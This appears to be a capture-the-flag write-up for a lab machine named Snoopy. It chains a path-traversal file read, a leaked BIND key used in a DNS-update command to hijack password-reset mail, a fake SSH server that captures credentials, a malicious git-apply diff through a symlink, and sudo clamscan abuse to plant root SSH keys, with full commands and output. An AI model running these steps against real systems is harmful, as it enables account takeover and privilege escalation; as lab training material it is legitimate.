Scan
> TARGET=10.129.219.171 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain syn-ack ttl 63 ISC BIND 9.18.12-0ubuntu0.22.04.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.18.12-0ubuntu0.22.04.1-Ubuntu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-title: SnoopySec Bootstrap Template - Index
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Domain:
snoopy.htb - http://10.129.219.171/about.html
cschultz@snoopy.htb
sbrown@snoopy.htb
hangel@snoopy.htb
lpelt@snoopy.htb
info@snoopy.htb
- http://10.129.219.171/contact.html
POST /forms/contact.php HTTP/1.1
Unable to load the "PHP Email Form" Library!
# note the following notice
Attention: As we migrate DNS records to our new domain please be advised that our mailserver 'mail.snoopy.htb' is currently offline.
- LFI fuzz on
/download?file= found a local file read vulnerability
> wfuzz -z file,/usr/share/wordlists/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -u 'http://snoopy.htb/download?file=FUZZ' --hh 0
....//....//....//....//etc/passwd
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://snoopy.htb/" -H "Host: FUZZ.snoopy.htb"
000000582: 200 0 L 141 W 3132 Ch "mm"
Web enum via local file read
> curl http://snoopy.htb/download?file=....//....//....//....//etc/passwd -o- >file && unzip -p file | grep home
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 796 100 796 0 0 833 0 --:--:-- --:--:-- --:--:-- 833
cbrown:x:1000:1000:Charlie Brown:/home/cbrown:/bin/bash
sbrown:x:1001:1001:Sally Brown:/home/sbrown:/bin/bash
clamav:x:1002:1003::/home/clamav:/usr/sbin/nologin
lpelt:x:1003:1004::/home/lpelt:/bin/bash
cschultz:x:1004:1005:Charles Schultz:/home/cschultz:/bin/bash
vgray:x:1005:1006:Violet Gray:/home/vgray:/bin/bash
- Zone transfer allowed,
allow-update enables dynamic dns, rndc key can also be found in /etc/bind/named.conf. - This can be abused with dynamic dns update attack
# /etc/bind/named.conf.options
options {
directory "/var/cache/bind";
dnssec-validation no;
allow-transfer {10.0.0.0/8;};
//listen-on-v6 { any; };
};
# /etc/bind/named.conf.local
zone "snoopy.htb" IN {
type master;
file "/var/lib/bind/db.snoopy.htb";
allow-update { key "rndc-key"; };
allow-transfer { 10.0.0.0/8; };
};
# /etc/bind/named.conf
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
key "rndc-key" {
algorithm hmac-sha256;
secret "BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=";
};
Login to mattermost
- on the subdomain
mm.snoopy.htb, there is a password reset form: http://mm.snoopy.htb/reset_password - however, the mail server dns record is missing, therefore mails cannot be sent successfully.
- the goal is to fix the dns record so that we can receive the password reset mail.
- Add mail.snoopy.htb to target’s dns, we have the rndc key from above, and ddns is enabled on the target.
> echo 'server ns1.snoopy.htb\nupdate add mail.snoopy.htb. 3600 A <attacker>\nsend\nquit' | nsupdate -y hmac-sha256:rndc-key:BEqUtce80uhu3TOEGJJaMlSx9WT2pkdeCtzBeDykQQA=
# Check the domain is added via
> dig axfr @10.129.219.171 snoopy.htb
- Reset password of an email account and listen for callback via
http://mm.snoopy.htb/reset_password
# note that the server resets the new record very quickly
> python -m smtpd -n -c DebuggingServer <attacker>:25
- trim the returned email correctly
# example
b'Reset Password ( http://mm.snoopy.htb/reset_password_complete?token=3Ddtc3c='
b'e3xsh143tu3wuem35x7fii47kudm4u6rtdpmp9a19u8gux54oamr74jc46y )'
# should be trimmed to be:
http://mm.snoopy.htb/reset_password_complete?token=dtc3ce3xsh143tu3wuem35x7fii47kudm4u6rtdpmp9a19u8gux54oamr74jc46y
- We can do this for any users we found on the system
cschultz@snoopy.htb
sbrown@snoopy.htb
hangel@snoopy.htb
lpelt@snoopy.htb
info@snoopy.htb
pjean@snoopy.htb
cbrown@snoopy.htb
admin@local.htb
- After login, we see some message in the channel:
Tower Square and learnt that there is a new channel for provisioning servers.
cbrown
1:18 PM
Hey everyone, I just created a new channel dedicated to submitting requests for new server provisions as we start to roll out our new DevSecOps tool.
- There is a channel for provisioning servers
Server Provisioning, in the channel, there is a custom command: /server_provision which allows you to send a request to devops and provision a server. This will result in a devops person attempting to login to a ssh server that you indicate. - Setup a paramiko ssh server: https://stackoverflow.com/questions/71368098/creating-python-sshserver
- and printout the username and password received from the client
> python sshserver.py
[+] Listening for connection ...
[+] Got a connection! from ('10.129.219.171', 44908)
cbrown sn00pedcr3dential!!!
user: sbrown
- Login as
cbrown and check sudo rights
cbrown@snoopy:~$ sudo -l
[sudo] password for cbrown:
Matching Defaults entries for cbrown on snoopy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User cbrown may run the following commands on snoopy:
(sbrown) PASSWD: /usr/bin/git apply *
diff --git a/symlink b/symlink2
similarity index 100%
rename from symlink
rename to symlink2
--
diff --git /dev/null b/symlink2/authorized_keys
new file mode 100644
index 0000000..b249f1a
--- /dev/null
+++ b/symlink2/authorized_keys
@@ -0,0 +1,1 @@
+<content from your .ssh/id_rsa.pub>
- We need to create a local repo and apply the above diff to a symbolic link pointing to /home/sbrown/.ssh/authorized_keys, so that we can ssh into the target using our public key.
# create a repo
cbrown@snoopy:~$ mkdir test
cbrown@snoopy:~$ cd test/
cbrown@snoopy:~/test$ git init
hint: Using 'master' as the name for the initial branch. This default branch name
hint: is subject to change. To configure the initial branch name to use in all
hint: of your new repositories, which will suppress this warning, call:
hint:
hint: git config --global init.defaultBranch <name>
hint:
hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
hint: 'development'. The just-created branch can be renamed via this command:
hint:
hint: git branch -m <name>
Initialized empty Git repository in /home/cbrown/test/.git/
# get the malicious diff
cbrown@snoopy:~/test$ wget http://<attacker>/test.diff
# create symbolic link
cbrown@snoopy:~/test$ ln -s /home/sbrown/.ssh symlink
# change folder permission where necessary
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown
cbrown@snoopy:~/repo$ chmod 777 /home/cbrown/test/
# apply the diff
cbrown@snoopy:~/test$ sudo -u sbrown /usr/bin/git apply test.diff
cbrown@snoopy:~/test$ ls -la
total 16
drwxrwxrwx 3 cbrown cbrown 4096 May 7 23:59 .
drwxrwxrwx 6 cbrown cbrown 4096 May 7 23:35 ..
drwxrwxr-x 7 cbrown cbrown 4096 May 7 23:35 .git
lrwxrwxrwx 1 sbrown sbrown 17 May 7 23:59 renamed-symlink -> /home/sbrown/.ssh
-rw-rw-r-- 1 cbrown cbrown 835 May 7 23:59 test.diff
- login as sbrown and get the user flag
> ssh sbrown@snoopy.htb
sbrown@snoopy:~$ cat user.txt
ef4af103ef2f2a0a73f7e8b46a4116fe
pe
sbrown@snoopy:~$ sudo -l
Matching Defaults entries for sbrown on snoopy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User sbrown may run the following commands on snoopy:
(root) NOPASSWD: /usr/local/bin/clamscan
- We can execute clamscan as root
- to learn more how this can be exploited, read the following posts
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-clamav-privilege-escalation/
https://www.youtube.com/watch?v=pplqa5MnztQ
https://docs.clamav.net/manual/Signatures/YaraRules.html
- But there is an issue with this approach as it is. Once the detected file got copied, it still carries it’s original permission and ownership, so we can’t read things like /etc/shadow and /root/root.txt
- In order to help us gain access as root, we can adopt the same strategy how we got user.
- First, we move any /root/.ssh/authorized_key away from there, and move the /home/sbrown/.ssh/authorized_keys copy there.
- A simple yara rule that can be used is below:
rule test
{
strings:
$abc = "root"
condition:
$abc
}
- Transfer the yara rule to the target and execute our strategy
# move the existing file away
sbrown@snoopy:~$ sudo /usr/local/bin/clamscan -i -d test.yara /root/.ssh/authorized_keys --move=/tmp/results/
/root/.ssh/authorized_keys: YARA.test.UNOFFICIAL FOUND
/root/.ssh/authorized_keys: moved to '/tmp/results/authorized_keys.001'
----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 1.0.0
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.008 sec (0 m 0 s)
Start Date: 2023:05:08 02:56:20
End Date: 2023:05:08 02:56:20
# move our copy there
sbrown@snoopy:~$ sudo /usr/local/bin/clamscan -i -d test.yara /home/sbrown/.ssh/authorized_keys --copy=/root/.ssh/
/home/sbrown/.ssh/authorized_keys: YARA.test.UNOFFICIAL FOUND
/home/sbrown/.ssh/authorized_keys: copied to '/root/.ssh/authorized_keys'
----------- SCAN SUMMARY -----------
Known viruses: 1
Engine version: 1.0.0
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.00 MB
Data read: 0.00 MB (ratio 0.00:1)
Time: 0.009 sec (0 m 0 s)
Start Date: 2023:05:08 02:57:04
End Date: 2023:05:08 02:57:04
- now, ssh to the target as root
root@snoopy:~# cat root.txt
0631bb9f26eba71c438c5ed5f691d5a7
